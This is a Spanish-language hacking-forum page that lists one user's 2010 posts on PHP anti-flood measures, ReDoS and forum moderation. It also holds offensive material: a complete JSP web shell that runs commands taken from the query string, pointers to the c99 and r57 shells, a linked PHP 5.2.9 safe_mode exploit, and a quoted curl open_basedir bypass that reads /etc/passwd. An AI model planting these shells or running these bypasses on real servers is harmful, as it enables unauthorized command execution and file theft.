Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#3321
Bienvenido! y cuando necesites una mano acá estamos.
Igual todos formamos parte de una sola comunidad y gracias al administrador el servidor sigue en pié y se ha salido adelante con financiamiento propio, es lo bueno, que no tienes que ir a un lugar y pagar cantidades de dinero a cambio de información, el internet es libre, el conocimiento y la decisión de quien ser y que camino elegir y nosotros elegimos estar acá para apoyarnos mutuamente.

Con respecto a lo de los paises, en el perfil de cada uno hay una parte donde puedes editar la localización y el pais, de todas formas si, es necesario entrar a un perfil para ver de donde es :P eso es por falta de feature del diseño del theme.
#3322
Lo agregué al post de recopilaciones, saludos  :D
#3323
Bueno, mas vale tarde que nunca xD, los que no tenían una fuente de referencia se fueron a la hoguera  :-\
#3324
PHP / Re: Impedir la repetición de una acción?
13 Febrero 2010, 00:48 AM
Esque smf tiene un sistema similar pero utiliza la misma sesión de la persona logueada, guarda tu id de usuario mas tu ip en un log llamado flood y te hace una comparación de tiempo entre tu última acción, ahora... puedes regularizar eso atraves de su cookie o ip pero recuerda que ambas cosas son bypaseables, o sea que ambas cosas pueden ser evadidas.

Lo que puedes hacer es ponerle una captcha al form, de esa forma si alguien quiere enviar mil formularios tendrá que ingresar mil captchas y eso es practicamente imposible a menos que la captcha sea muy debil y sea bypaseable por algún sistema OCR.

Te recomiendo que uses recaptcha y con eso solucionas todos los problemas ya que siempre hay un intervalo considerable entre que cargas la web, ingresas el captcha y envías el form y te ahorras la base de datos, el log, etc etc.
#3325
Dasky entró pidiendo ayuda y se le dió una respuesta, un tutorial básico de visual basic 6, si Dasky  tiene alguna duda puede volver a preguntar y se le ayudará según sea el caso.

De ahi a que alguien entre a trolear es otro tema, acá si alguien entra supongo que es por querer aportar, ayudar o aprender pero si alguien viene a molestar de forma prepotente diciendo que porque no damos un enlace hacia un video entonces no somos comunidad entonces eso es harina de otro costal.

A Dasky ya se le dió una respuesta y creo que el tema principal ya fue resuelto, si alguien quiere dicutir puede hacerlo en el msn o en alguna otra parte, acá nadie menosprecia a nadie ni por raza, color o porque sea de otro foro, todos son bienvenidos vengan de donde vengan siempre y cuando entren con una actitud mínimamente respetuosa.

Acá no se hecha a alguien porque tenga pocos conocimientos o porque tengan una ideología diferente a los demás, sino porque molestan y perturban a las personas que vienen de buena manera a buscar ayuda.

alexmanycool no te baneo porque seas de portalhacker, claro que no, sino por tu actitud irespetuosa contra todas las personas que entran al foro y eso no significa que uno no pueda dar una opinion o escribir lo que quieran expresarse. Una cosa es venir diciendo que elhacker.net es desepcionante porque no sabe usar el buscador para encontrar uno de los tantos tutoriales de visual basic 6 y otra cosa muy diferente es ir a la sección de dudas y consultas sobre el foro y abrir un tema preguntando "porqué no se ve ningún tutorial de visual basic", ahi si hubiera sido muy diferente y hubiera encontrado muchas respuestas de gente que si quiere aportar aunque sea buscando por otros.

Recopilación de enlaces de Visual Basic
http://foro.elhacker.net/programacion_vb/recopilacion_de_enlaces_de_visual_basic-t68352.0.html
#3326
Nivel Web / Re: consulta php 5.2.9 / xampp 1.7.1
6 Febrero 2010, 16:50 PM
Hola, esta es la herramienta que necesitas:
http://www.milw0rm.com/exploits/8799
www.milw0rm.com/sploits/2009-safemod-windows.zip

Este exploit funciona para xampp con versión de php 5.2.9 ya que la falla de seguridad se produce solamente en servidores con windows y no en linux y es porque wn windows bypasea el código ejecutando back slashses en ves de slashses normales, o ses procesa "\" como ruta válida y php "/" por lo tanto este exploit se aprobecha de eso para realizar una ejecución arbitraria de código .

El bug de curl en php 5.2.9 debe ser este:
http://seclists.org/fulldisclosure/2009/Apr/112

CitarThe main problem exist in checking safe_mode & open_basedir for curl
functions. There is a difference between checking the access and the
implementation of the operations.

Example code:
curl_setopt($ch, CURLOPT_URL, "file:file:////etc/passwd");

curl in the first place check safe_mode and open_basedir for

"file:////etc/passwd"
/* realpath is ./file:/etc/passwd */

and in next step will read

"file:////etc/passwd"
(without wrapper => /etc/passwd)

To attack, we need to cheat php by creating a virtual tree like

./file:/
./file:/etc/
./file:/etc/passwd/

Example for /etc/hosts :

./file:/
./file:/etc/
./file:/etc/hosts/

So if you execute the file as user X, we have to create special
subdirectories.

Ahi está todo explicado pero esa vulnerabilidad es local y no remota, eso quiere decir que debes tener acceso al host para modificar el script de php y tendrias acceso a la lectura de archivos locales desde curl pero no puedes hacerlo de forma remota a menos que tengan un script vulnerable como este tipo:
Código (php) [Seleccionar]
curl_setopt($ch, CURLOPT_URL, $_GET['url']);

En ese caso si podrías hacer lectura de archivos locales pero dependería mucho del script y como esté hecho.

Si quieres compartir el código fuente de tu keylogger como todo el resto puedes visitar esta sección:
http://foro.elhacker.net/analisis_y_diseno_de_malware-b17.0/

Saludos.
#3327
Lo que pasa es que php tiene un sistema de protección que cuando intentas causar una denegación de servicio atraves de una expresión regular entonces lo detiene y como se detiene retorna el valor no filtrado.

http://www.checkmarx.com/Upload/Documents/PDF/Checkmarx_OWASP_IL_2009_ReDoS.pdf

#3328
Nivel Web / Re: Ayuda. User-agent
4 Febrero 2010, 09:14 AM
si la idea es sacar el user agent de otra persona puedes usar php

Código (php) [Seleccionar]
$_SERVER['HTTP_USER_AGENT']

usas file_put_contents() para guardar el contenido de la ip ($_SERVER['REMOTE_ADDR']) mas user agent en un log de txt.

Está bueno el gráfico, mañana lo agrego al post de recopilatorios.
#3329
Nivel Web / Re: Shell para IIS
4 Febrero 2010, 09:12 AM
si necesitas para jsp acá tienes una:

Código (asp) [Seleccionar]
<%@ page import="java.io.*, java.net.*" %>

<%

       String queryString = request.getQueryString();



       if (queryString == null) return;



       String line;

       Process p = Runtime.getRuntime().exec(URLDecoder.decode(queryString));

       BufferedReader input = new BufferedReader(new InputStreamReader(p.getInputStream()));

       while ((line = input.readLine()) != null) {

               out.println(line);

       }

   input.close();

%>     

<form method=POST>

<input type=text name=queryString>

<input type=submit>

</form>


Si el servidor soporta php usas la c99, r57, el elephant o lo que se te ocurra.
#3330
eso se llama ReDoS (Regular Denial of Service)
por ahi anda un tuto, mañana lo busco que ya me voy a dormir :P